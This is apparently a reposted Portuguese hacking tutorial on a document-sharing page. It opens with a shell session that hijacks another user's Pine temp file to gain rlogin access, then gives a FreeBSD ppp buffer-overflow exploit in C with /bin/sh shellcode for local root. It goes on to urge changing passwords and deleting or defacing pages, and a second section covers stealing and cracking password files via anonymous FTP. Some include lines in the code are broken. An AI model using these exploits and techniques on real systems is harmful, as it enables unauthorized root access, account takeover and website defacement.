/tmp/.302.f5a4


hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine

catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep

pine

hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine


catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4

+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4


catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD".


#include

#include


#include
#define BUFFER_SIZE 156 /* size of the bufer to

overflow */


#define OFFSET -290 /* number of bytes to jump

after the start

of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])

{

char *buf = NULL;



unsigned long *addr_ptr = NULL;

char *ptr = NULL;

char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"

/* 16 bytes */


"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"

/* 16 bytes */


"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"

/* 20 bytes */


"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

/* 15 bytes, 57 total */


int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);

ptr = buf + i;


/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)

*ptr++ = execshell[i];


addr_ptr = (long *)ptr;

for(i=0;i < (104/4); i++)

*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;

*ptr = 0;


setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);

}

Agora voce tem o root. Faça o que você quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar. Pra trocar a senha da HP voce tem que é entrar via telnet E entrar com sua nova conta Ae voce digita "passwd :". Vai pedir a senha antiga e depois a senha que você quer colocar. Agora você só voce tem a senha e então é só fazer o que você quiser como deletar tudo e fazer o Upload das suas paginas.


tutorial2

HACKEANDO WEBPAGES!


1 - Pegando o Arquivo-Password via FTP


Um dos jeitos mais fáceis de de pegar acesso "super-usuário" é acessar anonimamente o ftp de alguma página. Primeiro aprenda um pouco sobre o arquivo-password.


root:User:d7Bdg:1n2HG2:1127:20:Superuser

TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh

BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
É claro que está página já foi hackeada pelo Psychotic, não tente hackea-la obviamente... Este é um exemplo de arquivo-password encriptado. O Superuser é a parte que te dá o root, a parte principal do arquivo.
root:x:0:1:Superuser:/:

ftp:x:202:102:Anonymous ftp:/u1/ftp:

ftpadmin:x:203:102:ftp Administrator:/u1/ftp
Este é um outro exemplo de password arquivo, só que este tem uma diferença. Está "shadowed". Arquivos-password shadoweds não deixam você ver o password encriptado. Isso causa problemas para os crackers de passwords e os dicionários. Se não sabe o que é isso eu explico mais abaixo. Aqui temos outro exemplo de arquivo-password shadowed:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false

ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Arquivos shadowed tem um "x" no lugar do password, como voce pode ver aí em cima. Algumas vezes tem um "*" também.
Agora que você conhece um pouco sobre estes arquivos você deve saber como distinguir um normal de um shadowed. Se o password não estiver shadowed, não preciso nem explicar o que fazer! Agora vamos ver como quebrar passwords shadowed!

2 - Cracking Arquivos-Password Shadowed


Não é tão difícil quanto vocês pensam. Se bem que os arquivos variam de sistema pra sistema. Primeiro copie o arquivo-password para seu computador. Segundo: Pegue um password cracker e/ou um gerador de wordlist (dicionário). É quase impossível achar um bom cracker, mas existem alguns regulares, como: Cracker Jack, John the Ripper, Brute Force Cracker e Jack the Ripper. Não me pergunte onde encontrá-los, procure! Quando você começar a crackear o password, você vai ser perguntado para achar o arquivo-password. É onde o dicionário entra. Ele vai achar todas as combinações de letras, números, ASCII e lowercase possíveis. Nós estaremos publicando em breve também nosso cracker-wordlist, chamado "The Perfect Drug". Aguardem! Vá crackeando e veja em que direção está indo o password. Muitas vezes você descobre antes que o dicionário termine.



Yüklə 308,5 Kb.

Dostları ilə paylaş:
1   2   3




Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©muhaz.org 2024
rəhbərliyinə müraciət

gir | qeydiyyatdan keç
    Ana səhifə


yükləyin